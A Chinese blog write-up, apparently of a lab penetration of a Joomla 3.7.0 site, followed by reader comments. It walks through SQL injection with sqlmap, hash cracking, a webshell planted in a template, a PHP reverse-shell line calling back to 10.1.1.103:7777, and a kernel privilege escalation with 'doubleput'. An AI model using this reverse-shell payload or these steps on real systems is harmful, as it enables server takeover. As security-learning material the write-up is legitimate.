记一次对 Joomla CMS 渗透过程

OnionT@KillBoy
OnionT@KillBoy
作者
47
文章
0
粉丝
渗透测试4618,7062字数 265阅读0分53秒阅读模式
AI智能摘要
从Joomla 3.7.0的SQL注入漏洞到系统权限突破,这场渗透测试层层递进犹如技术迷宫探险。当普通扫描工具失效时,如何通过命令行精准爆破数据库?又是哪条关键指令成功绕过防火墙实现权限升级?本文完整还原从漏洞利用到提权实战的全过程,为安全研究者揭开渗透测试中那些教科书未载的攻防细节。
— AI 生成的文章内容摘要

首先,对其进行扫描
记一次对 Joomla CMS 渗透过程-图片1
发现其版本为 Joomla 3.7.0

于是,搜索这个版本的漏洞,,,
记一次对 Joomla CMS 渗透过程-图片2
发现存在SQL注入漏洞,继续查看详情
记一次对 Joomla CMS 渗透过程-图片2
上sqlmap跑一波,成功爆库。。。
记一次对 Joomla CMS 渗透过程-图片2
接下来,爆表
记一次对 Joomla CMS 渗透过程-图片2
爆用户名密码
记一次对 Joomla CMS 渗透过程-图片2
在线跑了一下MD5,实在是跑不出来,接下来试试John破解
记一次对 Joomla CMS 渗透过程-图片2
成功破解,得到密码,登录后台,进入模板写入一句话
访问:http://10.1.1.104/templates/protostar/shell.php 没有问题,菜刀连接
记一次对 Joomla CMS 渗透过程-图片2
查看权限,发现不是root
记一次对 Joomla CMS 渗透过程-图片2
接下来进行提权,首先我们查看系统版本,发现是linux 4.4.0,查找一个这个版本的漏洞
试了好几个都不行,发现这个可以
记一次对 Joomla CMS 渗透过程-图片2
好,我们上传exp
记一次对 Joomla CMS 渗透过程-图片2
提权、、、、菜刀不好用,写一个反弹PHP文件,反弹回来一个shell
记一次对 Joomla CMS 渗透过程-图片2

<?php system("bash -c 'bash -i >& /dev/tcp/10.1.1.103/7777 0>&1'"); ?>

本地监听 7777 然后访问:http://10.1.1.104/templates/protostar/cmd.php成功反弹shell
记一次对 Joomla CMS 渗透过程-图片3
接着继续提权、、、运行如下两个文件

./compile.sh ./doubleput

记一次对 Joomla CMS 渗透过程-图片4
OK,提权成功。。。

http://www.oniont.cn/index.php/archives/250.html

 
OnionT@KillBoy
评论  46  访客  46
    • 小猫喵星
      小猫喵星 0

      这版本也太老了吧,难怪一打一个准

        • 安静如水
          安静如水 0

          @ 小猫喵星 这版本怕不是还在用XP系统吧…

        • 古道驼铃
          古道驼铃 0

          之前搞过类似项目,提权卡三天都没搞定😭

          • BoldAndBrash
            BoldAndBrash 0

            不是root确实不算彻底成功,但能进后台也算阶段性胜利

            • 熊猫超人
              熊猫超人 1

              这操作看着丝滑,其实全是老套路了

              • 话痨の梦
                话痨の梦 1

                菜刀连不上我就换nc,反正PHP一句话通吃

                • 闪耀新星
                  闪耀新星 0

                  doubleput那个exp得配合compile.sh用,不然容易崩

                  • 水心
                    水心 0

                    反弹shell那段代码我试了,得先把IP改了才行

                    • 奶牛妹
                      奶牛妹 0

                      菜刀不好用的时候我都直接换msf,省事

                      • 烟波江
                        烟波江 0

                        MD5还能跑出来?这盐值没加吧😂

                        • 尴尬癌晚期
                          尴尬癌晚期 0

                          提权那块doubleput是4.4.0的exp吧?求链接

                          • 果酱猫
                            果酱猫 1

                            之前搞过joomla,后台模板写shell真方便

                            • 烟雨楼
                              烟雨楼 0

                              不是root也敢叫渗透成功?有点严格了

                              • 影梦
                                影梦 0

                                防火墙都没拦一下,这环境是摆设?

                                • 寂静深渊
                                  寂静深渊 0

                                  反弹shell那行php代码我抄了,回头试试

                                  • 寒江渔
                                    寒江渔 0

                                    linux提权永远卡在找exp这步,太难了

                                    • 傲山人
                                      傲山人 0

                                      看不懂,但感觉操作很丝滑,666

                                      • 幻剑游侠
                                        幻剑游侠 0

                                        这版本现在还有人在用?心真大😂

                                        • 落月摇情
                                          落月摇情 1

                                          反弹shell那段写得挺清楚,收藏了

                                          • 豆豆鸟
                                            豆豆鸟 0

                                            提权成功之后呢,能干啥?

                                            • 铁画眉
                                              铁画眉 1

                                              防火墙跟没有一样,这配置也太随意了

                                              • 冷眸少年
                                                冷眸少年 0

                                                joomla后台路径也太好猜了吧

                                                • 摸鱼小能全
                                                  摸鱼小能全 1

                                                  直接写shell进模板,这后台没审核?

                                                  • 觉醒者
                                                    觉醒者 1

                                                    跑MD5没出来,密码强度可以啊

                                                    • 古树之灵
                                                      古树之灵 1

                                                      4.4.0的exp现在还能用吗,怕有补丁了

                                                      • 金字塔
                                                        金字塔 1

                                                        看截图,工具界面挺复古的

                                                        • 白羊烈火
                                                          白羊烈火 1

                                                          渗透成功是指拿到shell就算吗?

                                                            • 小鹿萌萌
                                                              小鹿萌萌 0

                                                              @ 白羊烈火 拿到shell只是开始,后续操作才是重头戏

                                                            • 程派风
                                                              程派风 1

                                                              反弹shell那段代码可以直接抄作业👍

                                                              • 影遁游侠
                                                                影遁游侠 0

                                                                这渗透过程看着好丝滑,羡慕了

                                                                • SocialJuggernaut
                                                                  SocialJuggernaut 0

                                                                  4.4.0的exp现在还能用吗?怕有补丁了

                                                                  • 梦回星砂
                                                                    梦回星砂 1

                                                                    之前也搞过joomla,后台写shell确实方便

                                                                    • 远途寻梦
                                                                      远途寻梦 1

                                                                      不是root权限也能叫成功?有点严格了吧

                                                                      • LoudAndProud
                                                                        LoudAndProud 0

                                                                        菜刀用不了的时候我也喜欢换msf

                                                                        • 旧海报
                                                                          旧海报 0

                                                                          MD5跑不出来说明密码强度还可以

                                                                          • 棉花糖星星
                                                                            棉花糖星星 1

                                                                            防火墙跟摆设似的,这配置也太随意了

                                                                            • Dog汪
                                                                              Dog汪 0

                                                                              这版本现在还有人用?心真大

                                                                              • 小生风华
                                                                                小生风华 0

                                                                                渗透到这就结束了?后面不继续了?

                                                                                • 量子幽灵画家
                                                                                  量子幽灵画家 0

                                                                                  doubleput那个exp求个链接

                                                                                    • 暴走的小蘑菇
                                                                                      暴走的小蘑菇 1

                                                                                      @ 量子幽灵画家 https://www.exploit-db.com/exploits/41886 这个就是doubleput的exp

                                                                                    • 夜空守望
                                                                                      夜空守望 1

                                                                                      反弹shell那段可以再细点吗

                                                                                        • 飞鸿驿使
                                                                                          飞鸿驿使 1

                                                                                          @ 夜空守望 同求,那段感觉跳得有点快

                                                                                        • 破碎的浪花
                                                                                          破碎的浪花 0

                                                                                          防火墙开着跟没开一样,管理员真的不背锅?

                                                                                          • 大熊熊
                                                                                            大熊熊 1

                                                                                            感觉写shell那段挺稳的,我一般直接丢马

                                                                                            • 镖帅沈鸿
                                                                                              镖帅沈鸿 0

                                                                                              求问这个joomla版本现在还能扫到吗?

                                                                                              • SchnitzelVonCrumb
                                                                                                SchnitzelVonCrumb 1

                                                                                                反弹shell那段代码有点眼熟啊

                                                                                              匿名

                                                                                              发表评论

                                                                                              匿名网友

                                                                                              拖动滑块以完成验证